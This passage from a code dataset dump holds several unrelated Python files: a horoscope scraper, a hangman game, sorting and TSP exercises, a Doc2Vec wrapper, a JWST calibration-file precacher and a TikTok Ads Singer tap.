file.close()\n","repo_name":"sktime/sktime","sub_path":"sktime/datasets/_readers_writers/arff.py","file_name":"arff.py","file_ext":"py","file_size_in_byte":9141,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"7791648072","text":"from __future__ import unicode_literals\n\nfrom datetime import date, timedelta\nfrom lxml import html\nimport requests\n\nclass BaseSpider(object):\n STAR_SIGNS = list(enumerate([\n 'Aries',\n 'Taurus',\n 'Gemini',\n 'Cancer',\n 'Leo',\n 'Virgo',\n 'Libra',\n 'Scorpio',\n 'Sagittarius',\n 'Capricorn',\n 'Aquarius',\n 'Pisces',\n ]))\n\n @property\n def FIRST_DATE(self):\n raise NotImplementedError\n\n @property\n def LAST_DATE(self):\n raise NotImplementedError\n\n @property\n def QUERY_SELECTOR(self):\n raise NotImplementedError\n\n def __init__(self, star_sign, max_days_to_read=None):\n assert isinstance(star_sign, int)\n assert star_sign >= 0 and star_sign <= 11\n assert isinstance(max_days_to_read, int) or max_days_to_read is None\n\n self._TIMESPAN = (self.LAST_DATE - self.FIRST_DATE).days if max_days_to_read is None else max_days_to_read\n self.star_sign = star_sign\n\n def __str__(self):\n return self.__class__.__name__\n\n def 
_get_url(self, ref_date):\n        raise NotImplementedError\n\n    def _find_message_dom(self, dom):\n        raise NotImplementedError\n\n    def __iter__(self):\n        self._days_read = 0\n        return self\n\n    def __len__(self):\n        return self._TIMESPAN\n\n    def next(self):\n        if self._days_read == self._TIMESPAN:\n            raise StopIteration\n\n        doi = self.FIRST_DATE + timedelta(days=self._days_read)\n        self._days_read += 1\n\n        page = requests.get(self._get_url(doi))\n        tree = html.fromstring(unicode(page.content, errors='ignore'))\n\n        return {\n            'source': str(self),\n            'star_sign_index': self.star_sign,\n            'star_sign_name': self.STAR_SIGNS[self.star_sign][1],\n            'date': doi.strftime('%Y-%m-%d'),\n            'message': self._find_message_dom(tree.xpath(self.QUERY_SELECTOR)),\n        }\n\n    def __next__(self):\n        return self.next()\n","repo_name":"daiaventureira/cosmos.garden","sub_path":"model/crawler/spiders/base_spider.py","file_name":"base_spider.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71603581604","text":"# Simple Hangman project 07/06/2021\n\nimport art\nimport random\n\n# Introduction:\nprint('\\n WELCOME TO THE HANGMAN GAME - GOOD LUCK !! \\n')\n\n# Word list and choosing a random word from the list:\npalavras = ['cobra', 'barata', 'sapato', 'brinco', 'taturana', 'zebra', 'chocolate',\n            'pokemon', 'dado', 'escola', 'trabalho', 'rua', 'asfalto', 'triste', 'alegre',\n            'bravo', 'azul', 'amor', 'vermelhor', 'amarelo', 'violeta', 'zangado', 'vaca', 'tatu',\n            'computador', 'escrivaninha', 'saco', 'motocicleta', 'chuteira', 'futebol', 'basket',\n            'paralelepipedo', 'ansioso', 'tremendo', 'orgulho']\npalavra_escolhida = random.choice(palavras)\n\n# Testing the code:\nprint(f'The key word is: {palavra_escolhida}')\n\n# Creating blanks:\nblanks = []\nfor letras in palavra_escolhida:\n    blanks += '_'\n\n# Starting the game:\nfim_de_jogo = False\nvidas = 6\n\nwhile not fim_de_jogo:\n    user_input = input('Choose a letter: ').lower()\n\n    # Letter choice logic\n    if user_input in blanks:\n        print('\\nYou have already chosen that letter, choose another one!\\n')\n    else:\n        # Checking the chosen letter against the chosen word.\n        for posicao in range(len(palavra_escolhida)):\n            if palavra_escolhida[posicao] == user_input:\n                blanks[posicao] = user_input\n\n        # Checking whether the user chose wrong:\n        if user_input not in palavra_escolhida:\n            vidas -= 1\n            print('The word does not contain that letter\\n')\n            if vidas == 0:\n                fim_de_jogo = True\n                print('\\nWHAT A PITY, you lost, try again!')\n\n        # Joining the letters into a single string.\n        print(f\"{' '.join(blanks)}\")\n\n        # Checking whether \"_\" still exists in blanks.\n        if \"_\" not in blanks:\n            fim_de_jogo = True\n            print('\\nCONGRATULATIONS, you got all the letters right!!')\n\n        # Showing the art:\n        print(art.stages[vidas])","repo_name":"calebeandrade93/100_Days_Python_Projects","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11356425314","text":"import math\nimport random\nimport matplotlib.pyplot as plt\n\ndef randIntegers(N):\n    numbers = list(range(N))\n    random.shuffle(numbers)\n    return numbers\n\ndef almostSortedIntegers(N):\n    numbers = list(range(N))\n    displacement = 2\n    for i in range(N // 3):\n        random_index = random.randint(displacement, N-1)\n        temp = numbers[random_index]\n        numbers[random_index] = numbers[random_index - 
displacement]\n numbers[random_index - displacement] = temp\n return numbers\n\ndef reversedAlmostSoretdIntegers(N):\n numbers = almostSortedIntegers(N)\n return list(reversed(numbers))\n\ndef randomGauss(N):\n numbers = []\n for i in range(N):\n numbers.append(random.gauss(13, 2))\n return numbers\n\ndef repeatedIntegers(N):\n numbers = []\n for i in range(N):\n numbers.append(random.randint(0, math.floor(math.sqrt(N))))\n return numbers\n\n\n# N = 100\n\n# with open(\"RandomIntegers.txt\", \"w\") as output:\n# print(randIntegers(N), file = output)\n\n# with open(\"AlmostSortedIntegers.txt\", \"w\") as output:\n# print(almostSortedIntegers(N), file = output)\n# # print(list(range(N)), file = output)\n\n# with open(\"ReversedAlmostSortedIntegers.txt\", \"w\") as output:\n# print(reversedAlmostSoretdIntegers(N), file = output)\n# # print(list(range(N)), file = output)\n\n# with open(\"Gauss.txt\", \"w\") as output:\n# print(randomGauss(N), file = output)\n\n# with open(\"RepeatedIntegers.txt\", \"w\") as output:\n# print(repeatedIntegers(N), file = output)\n","repo_name":"BloodyShrimp/Python_2021-22","sub_path":"Zestaw11/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17465950704","text":"def quick_sort(arr,low,high):\r\n if low < high:\r\n partition_pos = partition(arr,low,high)\r\n quick_sort(arr,low,partition_pos-1)\r\n quick_sort(arr,partition_pos+1,high)\r\n\r\ndef partition(arr,low,high):\r\n i = low\r\n j = high - 1\r\n pivot = arr[high] # last element of the array\r\n\r\n while i < j:\r\n while i < high and arr[i] < pivot:\r\n i += 1\r\n while j > low and arr[j] >= pivot:\r\n j -= 1\r\n if i < j:\r\n arr[i],arr[j] = arr[j],arr[i]\r\n if arr[i] > pivot:\r\n arr[i],arr[high] = arr[high],arr[i]\r\n \r\n return i\r\n\r\narr = [8,5,3,4,26,6,9,52]\r\nquick_sort(arr,0,len(arr)-1)\r\nprint(arr)\r\n\r\nprint(\"Hello World\")","repo_name":"iamrahul-9/45-DAYS-DSA","sub_path":"Day16.py","file_name":"Day16.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33367611327","text":"from gensim.models.doc2vec import Doc2Vec as D2V, TaggedDocument\nimport joblib\nimport gc\n\nclass Doc2Vec():\n def __init__(self, input_df):\n self.data = input_df.drop_duplicates(subset = \"text_index\")\n \n def tag_docs(self, stop_words = False):\n if stop_words:\n self.documents_col = \"text_preprocessed\"\n else:\n self.documents_col = \"text_no_stop\"\n self.tagged_docs = [TaggedDocument(words=doc.split(), tags=[i]) for i, doc in enumerate(self.data[self.documents_col])]\n\n def document_encode(self, dimensions = 100, iterations = 1500):\n self.dimensions = dimensions\n \n model = D2V(vector_size = int(dimensions), window = 4, epochs = iterations, dm = 0) ## DM = 0 for DBOW\n model.build_vocab(self.tagged_docs)\n model.train(self.tagged_docs, total_examples=model.corpus_count, epochs=model.epochs)\n self.document_embeddings = [model.infer_vector(doc.split()) for doc in self.data[self.documents_col]]\n del model\n gc.collect()\n \n def save_docs(self, directory, stop_words, name = None):\n stops = \"\"\n if not stop_words:\n stops = \"_b\"\n if not name:\n name = f\"Doc2Vec - {self.dimensions} dimensions{stops}.joblib\"\n if not name.endswith(\".joblib\"):\n name = f\"{name}.joblib\"\n\n with open(f'{directory}/{name}', 'wb') as file:\n 
joblib.dump(self.document_embeddings, file)\n        file.close()","repo_name":"tomlanstone/Dissertation---Main-Code-Only","sub_path":"Code and data/Code/Classes/Doc2Vec.py","file_name":"Doc2Vec.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5202759790","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef modelo(x, lam):\n    return np.exp(-x/lam)/lam\n\ndef p_lam(lam):\n    if lam>=1 and lam<=99:\n        return 1/99.0\n    else:\n        return 0\n\ndef p_x_l(obs, lam):\n    mul = 1.0\n    norm = -np.exp(-20/float(lam))+np.exp(-1/float(lam))\n    for dato in obs:\n        mul *= modelo(dato,lam)/norm\n    return mul\n\nx = [1.2, 2.5, 2.8, 5.0]\n\np_lam_x = []\nfor i in range(1,100):\n    p_lam_x.append(p_x_l(x, i)*p_lam(i))\n\nplt.figure()\nplt.plot(range(1,100),np.asarray(p_lam_x))\nplt.savefig(\"figurita.pdf\")\n\n\n    \n","repo_name":"RafaD0507/RafaelSanabria_Ejercicio24","sub_path":"westside.py","file_name":"westside.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39933694197","text":"#pip install python_tsp\r\nfrom python_tsp.exact import solve_tsp_dynamic_programming\r\nimport os\r\nos.chdir(\"C:\\\\Users\\\\Endrit\\\\Desktop\\\\Master Finance\\\\2nd Semster\\\\Programming\\\\ProjectVF\\\\\")\r\nprint(\"Current working directory: {0}\".format(os.getcwd()))\r\nfrom ClassCities import Cities\r\nfrom ClassNNV import NNV\r\nfrom ClassAnt import Ant\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\nnnvprec = []\r\nantprec = [] \r\nantnprec = [] \r\nbfprec = []\r\nfor n in range(5,8) :\r\n    stat = 0\r\n    print(\"this is :\",n)\r\n    for i in range(1,100) :\r\n        nnv = NNV(n,i)\r\n        nnv.swapR()\r\n        ant = Ant(n,i)\r\n        ant.desir()\r\n        ant.Sim() # by default, the number of ants generated is 30% of the number of cities\r\n        a = Cities(n,i)\r\n        distance_matrix = a.mat\r\n        permutation, distance = solve_tsp_dynamic_programming(distance_matrix)\r\n        bfprec.append(distance)\r\n        nnvprec.append(nnv.mindis)\r\n        antprec.append(ant.bestTests)\r\n        antt = Ant(n,i)\r\n        antt.desir()\r\n        antt.Sim(maxfrac=1) # here we generate as many ants as the number of cities\r\n        antnprec.append(antt.bestTests)\r\n        \r\nnnvpreC = np.round(np.array(nnvprec),12) # here we round to 12 decimals\r\nantpreC = np.round(np.array(antprec),12)\r\nantnpreC = np.round(np.array(antnprec),12)\r\nbfpreC = np.round(np.array(bfprec),12)\r\nnnvpreC = (nnvpreC-bfpreC)/bfpreC\r\nantpreC = (antpreC-bfpreC)/bfpreC\r\nantnpreC = (antnpreC-bfpreC)/bfpreC\r\n\r\nmeanNNV = np.mean(nnvpreC)\r\nmeanANT = np.mean(antpreC)\r\nmeanNANT = np.mean(antnpreC)\r\n\r\nprint(\"this is the average precision of the NNV algorithm over 100 iterations from 5 to 20 cities :\",1-meanNNV)\r\nprint(\"this is the average precision of the Ant algorithm with number of ants = 0.3n over 100 iterations from 5 to 20 cities :\",1-meanANT)\r\nprint(\"this is the average precision of the Ant algorithm with number of ants = n over 100 iterations from 5 to 20 cities :\",1-meanNANT)\r\n\r\n#this is the average precision of the NNV algorithm over 100 iterations from 5 to 20 cities : 0.9618642998308147\r\n#this is the average precision of the Ant algorithm with number of ants = 0.3n over 100 iterations from 5 to 20 cities : 0.8413103734128827\r\n#this is the average precision of the Ant algorithm with number of ants = n over 100 iterations from 5 to 20 cities : 
0.9688680799305202\r\n\r\n\r\n\r\n","repo_name":"Endkas/TSP","sub_path":"PrecisionAlgorithms.py","file_name":"PrecisionAlgorithms.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32827190416","text":"num = int(input())\nin1 = []\nin3 = []\nshownum = []\ngoto = 0\ncount = 0\nans = 0\nfor i in range(num):\n    num1 = input()\n    in1.append(num1)\nin2 = input().split(\" \")\nwhile True:\n    num3 = int(input())\n    if num3 == -1:\n        break\n    in3.append(num3)\n\nans = in1+in2+in3\nfor i in ans:\n    if goto == 0:\n        shownum.append(i)\n        count+=1\n        goto+=1\n    else:\n        shownum.insert(0, i)\n        count=0\n        goto-=1\nprint(str(shownum))\n\n\n\n\n","repo_name":"Thanakorn255/Python_Daily","sub_path":"Day012.py","file_name":"Day012.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7535775358","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cmasher as cmr\n\n\n\n# Dictionary of HMC hub colors \nhubPalette = {\n    \"Information\":\"#A0235A\",\n    \"Health\":\"#D23264\",\n    \"Matter\":\"#F0781E\",\n    \"Energy\":\"#FFD228\",\n    \"Aeronautics, Space and Transport\":\"#50C8AA\",\n    \"Earth and Environment\":\"#326469\"\n    }\n\n# List of HMC color palette\nHMCPalette = [\n    \"#A3C6E1\",\n    \"#005AA0\",\n    \"#0A2D6E\",\n    \"#1B3142\",\n    \"#5A696E\",\n    \"#7B878B\",\n    \"#ADB7BA\",\n    \"#D6F094\",\n    \"#8CB423\",\n    \"#3F5704\"\n    ]\n\n# List of Hub Info color Palette \nhubInfoPalette = [\n    \"#005AA0\",\n    \"#0A2D6E\",\n    \"#051E30\",\n    \"#454747\",\n    \"#7B878B\",\n    \"#D979A3\",\n    \"#A0235A\",\n    \"#5E2940\",\n    \"#470723\"\n    ]\n\n# create color ramps for continuous data out of color palettes\n# function to create ramp: make_Ramp()\ndef make_Ramp( ramp_colors ): \n    from colour import Color\n    from matplotlib.colors import LinearSegmentedColormap\n\n    color_ramp = LinearSegmentedColormap.from_list( 'my_list', [ Color( c1 ).rgb for c1 in ramp_colors ] )\n    plt.figure( figsize = (15,3))\n    plt.imshow( [list(np.arange(0, len( ramp_colors ) , 0.1)) ] , interpolation='nearest', origin='lower', cmap= color_ramp )\n    plt.xticks([])\n    plt.yticks([])\n    return color_ramp\n\n\n# to be used in matplotlib: cmap\n# equivalent of plotnine: scale_color_cmap()\n# continuous color scale based on HMC color palette\nHMCRamp = make_Ramp(HMCPalette)\n#cmr.view_cmap(HMCRamp)\n\n# take discrete colors from the continuous HMC ramp (moved here so that HMCRamp is defined first)\ncolors = cmr.take_cmap_colors(HMCRamp, None, cmap_range=(0.2, 0.8), return_fmt='hex')\n\n# continuous color scale based on Hub Info color palette\nhubInfoRamp = make_Ramp(hubInfoPalette)\n#cmr.view_cmap(hubInfoRamp)\n\n\n","repo_name":"Materials-Data-Science-and-Informatics/survey_dashboard","sub_path":"survey_dashboard/data/display_specifications/hmc_colordicts.py","file_name":"hmc_colordicts.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44684019002","text":"#!/usr/bin/env python\n#\n\"\"\"\nDownload CRDS cache files.\n\nBy Daizhong Liu.\n\n\"\"\"\n\nimport os, sys, re, datetime, glob, shutil\nassert os.environ[\"CRDS_PATH\"] != ''\nassert os.environ[\"CRDS_SERVER_URL\"] != ''\n#os.environ[\"CRDS_PATH\"] = os.path.expanduser('~/jwst_crds_cache')\n#os.environ[\"CRDS_SERVER_URL\"] = \"https://jwst-crds.stsci.edu\"\n\n# Import CRDS\nimport crds\nfrom stpipe import crds_client\n\n# Import JWST pipeline\nfrom jwst import datamodels\nfrom jwst.pipeline import calwebb_detector1\nfrom jwst.pipeline 
import calwebb_spec2\nfrom jwst.pipeline import calwebb_image2\nfrom jwst.pipeline import calwebb_spec3\n\n# Import click\nimport click\n\n# Setup logging\nimport logging\n\n# Define utility functions\ndef get_script_dir():\n \"\"\"Get current script file's directory path.\"\"\"\n return os.path.abspath(os.path.dirname(__file__))\n\ndef get_script_name():\n \"\"\"Get current script file name without the suffix and replaced some characters to underscores.\"\"\"\n return re.sub(r'[^a-zA-Z0-9_]', r'_', os.path.splitext(os.path.basename(__file__))[0])\n\ndef setup_logger():\n logger_streamhandler = logging.StreamHandler()\n logger_streamhandler_formatter = logging.Formatter(\"[%(asctime)-8s] %(message)s\", \"%H:%M:%S\")\n logger_streamhandler.setFormatter(logger_streamhandler_formatter)\n logger_streamhandler.setLevel(logging.DEBUG)\n\n log_file = get_script_name()\n log_time = datetime.datetime.now().strftime(\"%Y%m%d_%Hh%Mm%Ss\")\n logger_filehandler = logging.FileHandler(f\"log_{log_file}_{log_time}.txt\", mode='a')\n logger_filehandler_formatter = logging.Formatter(\"[%(asctime)-15s] %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n logger_filehandler.setFormatter(logger_filehandler_formatter)\n\n logger = logging.getLogger()\n while len(logger.handlers) > 0:\n del logger.handlers[0]\n logger.addHandler(logger_streamhandler)\n logger.addHandler(logger_filehandler)\n logger.setLevel(logging.DEBUG)\n \n return logger\n\n\n\n# Main \n@click.command()\n@click.argument('jwst_uncal_files', nargs=-1, type=click.Path(exists=True))\ndef main(jwst_uncal_files):\n\n # Add script dir to sys path\n if not (get_script_dir() in sys.path):\n sys.path.append(get_script_dir())\n \n # Setup logger\n logger = setup_logger()\n \n # Check input\n \n # Print CRDS pipeline version\n logger.info('CRDS pipeline version: {}'.format(crds.__version__))\n \n # \n pipeline_context = crds.client.get_default_context('jwst')\n logger.info('pipeline_context: {}'.format(pipeline_context))\n \n #crds.get_cached_mapping(pipeline_context) # need local file to exist\n \n #crds.rmap.load_mapping(pipeline_context)\n \n all_jwst_uncal_files = []\n \n for jwst_uncal_file in jwst_uncal_files:\n if jwst_uncal_file.find('*') >= 0:\n all_jwst_uncal_files.extend(glob.glob(jwst_uncal_file))\n else:\n all_jwst_uncal_files.append(jwst_uncal_file)\n \n all_jwst_uncal_files = list(set(sorted(all_jwst_uncal_files)))\n \n for jwst_uncal_file in all_jwst_uncal_files:\n \n # jwst_data_base_name = os.path.basename(jwst_uncal_file)\n # regex_match = re.match(r'^(jw[0-9]+_[0-9]+_[0-9]+)_([a-z0-9]+)_uncal.fits$', jwst_data_base_name)\n # if regex_match:\n # jwst_data_base_str = regex_match.group(1)\n # jwst_data_detector_str = regex_match.group(2)\n # payload = crds.client.get_aui_best_references(pipeline_context, [jwst_data_base_str+'.'+jwst_data_detector_str])\n # fcache = crds.api.FileCacher(pipeline_context, ignore_cache=False, raise_exceptions=False)\n # fcache.get_local_files([pipeline_context])\n \n # for key in payload.keys():\n # status = payload[key][0]\n # if status is not False:\n # bestrefs = payload[key][1]\n # fcache.get_local_files(bestrefs)\n # #for bestref in bestrefs:\n # # crds.client.get_flex_uri(bestref)\n \n # # with datamodels.open(jwst_uncal_file) as model:\n # # params = {\n # # 'INSTRUME': model.meta.instrument.name, \n # # 'DATE': model.meta.date, \n # # 'TIME': model.meta.observation.time,\n # # }\n # # crds.getreferences(\n # # parameters = parameters, \n # # reftypes = ['DARK'], \n # # context = pipeline_context,\n # # 
ignore_cache = False,\n # # observatory = 'jwst',\n # # )\n \n \n with datamodels.open(jwst_uncal_file) as model:\n exp_type = model.meta.exposure.type\n \n logger.info('Detector1Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n pipeline_object = calwebb_detector1.Detector1Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n \n \n logger.info('Spec2Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n if exp_type in ['NRS_IMAGE', 'NRS_WATA', 'NRS_MSATA', 'NRS_TACONFIRM', 'NRS_CONFIRM', 'NRS_FOCUS', 'NRS_MIMF']:\n pipeline_object = calwebb_image2.Image2Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n \n # No need stage 3\n # see https://jwst-pipeline.readthedocs.io/_/downloads/en/stable/pdf/\n # Table 4\n \n else:\n pipeline_object = calwebb_spec2.Spec2Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n # \n #shutil.copy2(jwst_uncal_file, jwst_uncal_file+'.tmp')\n #with datamodels.open(jwst_uncal_file+'.tmp') as model:\n # if model.meta.exposure.type in ['NRS_MSATA', 'NRS_TACONFIRM']:\n # model.meta.exposure.type = 'NRS_MSASPEC'\n # #pipeline_object._precache_references(model) # this will also fail\n # ovr_refs = {reftype: pipeline_object.get_ref_override(reftype) \n # for reftype in pipeline_object.reference_file_types \n # if pipeline_object.get_ref_override(reftype) is not None}\n # fetch_types = sorted(set(pipeline_object.reference_file_types) - set(ovr_refs.keys()))\n # for key in ['sflat', 'area']:\n # if key in fetch_types:\n # fetch_types.remove(key)\n # logger.info(\"Prefetching reference files for dataset: \" + repr(model.meta.filename) +\n # \" reftypes = \" + repr(fetch_types)) # following \"stpipe/pipeline.py\"\n # crds_refs = crds_client.get_multiple_reference_paths(\n # model.get_crds_parameters(), \n # fetch_types, \n # model.crds_observatory\n # )\n #os.remove(jwst_uncal_file+'.tmp')\n \n \n logger.info('Spec3Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n pipeline_object = calwebb_spec3.Spec3Pipeline()\n pipeline_object._precache_references(jwst_uncal_file) # this will fail\n # \n #shutil.copy2(jwst_uncal_file, jwst_uncal_file+'.tmp')\n # with datamodels.open(jwst_uncal_file+'.tmp') as model:\n # if model.meta.exposure.type in ['NRS_MSATA', 'NRS_TACONFIRM']:\n # model.meta.exposure.type = 'NRS_MSASPEC'\n # #pipeline_object._precache_references(model) # this will also fail\n # ovr_refs = {reftype: pipeline_object.get_ref_override(reftype) \n # for reftype in pipeline_object.reference_file_types \n # if pipeline_object.get_ref_override(reftype) is not None}\n # fetch_types = sorted(set(pipeline_object.reference_file_types) - set(ovr_refs.keys()))\n # for key in ['area']:\n # if key in fetch_types:\n # fetch_types.remove(key)\n # logger.info(\"Prefetching reference files for dataset: \" + repr(model.meta.filename) +\n # \" reftypes = \" + repr(fetch_types)) # following \"stpipe/pipeline.py\"\n # crds_refs = crds_client.get_multiple_reference_paths(\n # model.get_crds_parameters(), \n # fetch_types, \n # model.crds_observatory\n # )\n # ref_path_map = dict(list(crds_refs.items()) + list(ovr_refs.items()))\n # for (reftype, refpath) in sorted(ref_path_map.items()):\n # how = \"Override\" if reftype in ovr_refs else \"Prefetch\"\n # logger.info(f\"{how} for {reftype.upper()} reference file is '{refpath}'.\")\n # crds_client.check_reference_open(refpath)\n # os.remove(jwst_uncal_file+'.tmp')\n \n \n \n \n # create a timestamp file\n if os.path.dirname(jwst_uncal_file) == 'uncals':\n 
timestamp_file = os.path.dirname(os.path.dirname(jwst_uncal_file))+os.sep+'crds_cached'\n timestamp_str = datetime.datetime.now().strftime('%Y-%m-%d %Hh%Mm%Ss')\n with open(timestamp_file, 'w') as fp:\n fp.write(timestamp_str+'\\n')\n \n\n\n\n\n# Main\nif __name__ == '__main__':\n \n main()\n\n\n\n","repo_name":"1054/Crab.Toolkit.JWST","sub_path":"bin/go-jwst-spectroscopy-precache-crds-reference-files.py","file_name":"go-jwst-spectroscopy-precache-crds-reference-files.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42837522206","text":"#!/usr/bin/env python3\nimport os\nimport json\nimport backoff\nimport requests\nimport arrow\nimport singer\nfrom singer import utils, metadata\nfrom singer.catalog import Catalog, CatalogEntry\nfrom singer.schema import Schema\nfrom singer.transform import transform\nfrom six import string_types\nfrom six.moves.urllib.parse import urlencode, urlunparse\n\nREQUIRED_CONFIG_KEYS = [\"advertiser_id\", \"report_type\", \"start_date\", \"token\"]\nLOGGER = singer.get_logger()\nHOST = \"ads.tiktok.com\"\nPATH = \"/open_api/v1.2/reports/integrated/get\"\n\n\nclass TiktokError(Exception):\n def __init__(self, msg, code):\n self.msg = msg\n self.code = code\n super().__init__(self.msg)\n\n\ndef giveup(exc):\n \"\"\"\n code 40100 shows rate limit reach error\n it will give up on retry operation, if code is not 40100\n \"\"\"\n return exc.code != 40100\n\n\ndef get_abs_path(path):\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), path)\n\n\ndef load_schemas():\n \"\"\" Load schemas from schemas folder \"\"\"\n schemas = {}\n for filename in os.listdir(get_abs_path('schemas')):\n path = get_abs_path('schemas') + '/' + filename\n file_raw = filename.replace('.json', '')\n with open(path) as file:\n schemas[file_raw] = Schema.from_dict(json.load(file))\n return schemas\n\n\ndef build_url(path, query=\"\"):\n # type: (str, str) -> str\n \"\"\"\n Build request URL\n :param path: Request path\n :param query: Querystring\n :return: Request URL\n \"\"\"\n scheme, netloc = \"https\", HOST\n return urlunparse((scheme, netloc, path, \"\", query, \"\"))\n\n\ndef create_metadata_for_report(schema):\n mdata = [{\"breadcrumb\": [], \"metadata\": {\"inclusion\": \"available\"}}]\n for key in schema.properties:\n # hence when property is object, we will only consider properties of that object without taking object itself.\n if \"object\" in schema.properties.get(key).type:\n inclusion = \"available\" if key != \"dimensions\" else \"automatic\"\n mdata.extend(\n [{\"breadcrumb\": [\"properties\", key, \"properties\", prop], \"metadata\": {\"inclusion\": inclusion}} for prop\n in schema.properties.get(key).properties])\n else:\n mdata.append({\"breadcrumb\": [\"properties\", key], \"metadata\": {\"inclusion\": \"available\"}})\n\n return mdata\n\n\ndef discover():\n raw_schemas = load_schemas()\n streams = []\n for stream_id, schema in raw_schemas.items():\n stream_metadata = create_metadata_for_report(schema)\n key_properties = []\n streams.append(\n CatalogEntry(\n tap_stream_id=stream_id,\n stream=stream_id,\n schema=schema,\n key_properties=key_properties,\n metadata=stream_metadata\n )\n )\n return Catalog(streams)\n\n\n@backoff.on_exception(backoff.expo, TiktokError, max_tries=5, giveup=giveup, factor=2)\n@utils.ratelimit(10, 1)\ndef make_request(url, headers):\n response = requests.get(url, headers=headers)\n code = response.json().get(\"code\")\n if code 
!= 0:\n LOGGER.error('Return Code = %s', code)\n raise TiktokError(response.json().get(\"message\", \"an error occurred while calling API\"), code)\n\n return response\n\n\ndef request_data(attr, headers):\n page = 1\n total_page = 1\n all_items = []\n\n # do pagination\n while page <= total_page:\n attr[\"page\"] = page\n\n query_string = urlencode({k: v if isinstance(v, string_types) else json.dumps(v) for k, v in attr.items()})\n url = build_url(PATH, query_string)\n response = make_request(url, headers=headers)\n\n data = response.json().get(\"data\", {})\n all_items += data.get(\"list\", [])\n\n page = data.get(\"page_info\", {}).get(\"page\", 1) + 1\n total_page = data.get(\"page_info\", {}).get(\"total_page\", 1)\n return all_items\n\n\ndef sync(config, state, catalog):\n \"\"\" Sync data from tap source \"\"\"\n # Loop over selected streams in catalog\n for stream in catalog.get_selected_streams(state):\n LOGGER.info(\"Syncing stream:\" + stream.tap_stream_id)\n\n bookmark_column = \"stat_time_day\"\n mdata = metadata.to_map(stream.metadata)\n schema = stream.schema.to_dict()\n\n singer.write_schema(\n stream_name=stream.tap_stream_id,\n schema=schema,\n key_properties=stream.key_properties,\n )\n\n headers = {\"Access-Token\": config[\"token\"]}\n attr = {\n \"advertiser_id\": config[\"advertiser_id\"],\n \"report_type\": config[\"report_type\"],\n \"data_level\": \"AUCTION_\" + stream.tap_stream_id.replace(\"_id_report\", \"\").upper(),\n \"dimensions\": [stream.tap_stream_id.replace(\"_report\", \"\"), \"stat_time_day\"],\n \"lifetime\": False,\n \"page_size\": 200\n }\n\n start_date = singer.get_bookmark(state, stream.tap_stream_id, bookmark_column).split(\" \")[0] \\\n if state.get(\"bookmarks\", {}).get(stream.tap_stream_id) else config[\"start_date\"]\n\n while True:\n attr[\"start_date\"] = attr[\"end_date\"] = start_date # as both date are in closed interval\n LOGGER.info(\"Querying Date --> %s\", attr[\"start_date\"])\n tap_data = request_data(attr, headers)\n\n bookmark = attr[\"start_date\"]\n with singer.metrics.record_counter(stream.tap_stream_id) as counter:\n for row in tap_data:\n # Type Conversation and Transformation\n transformed_data = transform(row, schema, metadata=mdata)\n\n # write one or more rows to the stream:\n singer.write_records(stream.tap_stream_id, [transformed_data])\n counter.increment()\n bookmark = max([bookmark, row[\"dimensions\"][bookmark_column]])\n\n state = singer.write_bookmark(state, stream.tap_stream_id, bookmark_column, bookmark)\n singer.write_state(state)\n\n if start_date < str(arrow.utcnow().date()):\n start_date = str(arrow.get(start_date).shift(days=1).date())\n if bookmark >= str(arrow.utcnow().date()):\n break\n\n return\n\n\n@utils.handle_top_exception(LOGGER)\ndef main():\n # Parse command line arguments\n args = utils.parse_args(REQUIRED_CONFIG_KEYS)\n\n # If discover flag was passed, run discovery mode and dump output to stdout\n if args.discover:\n catalog = discover()\n catalog.dump()\n # Otherwise run in sync mode\n else:\n if args.catalog:\n catalog = args.catalog\n else:\n catalog = discover()\n state = args.state or {}\n sync(args.config, state, catalog)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yashdabhi078/tap-tiktok","sub_path":"tap_tiktok/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73893551204","text":"from torch import nn\r\n\r\nfrom layers.Embedding 
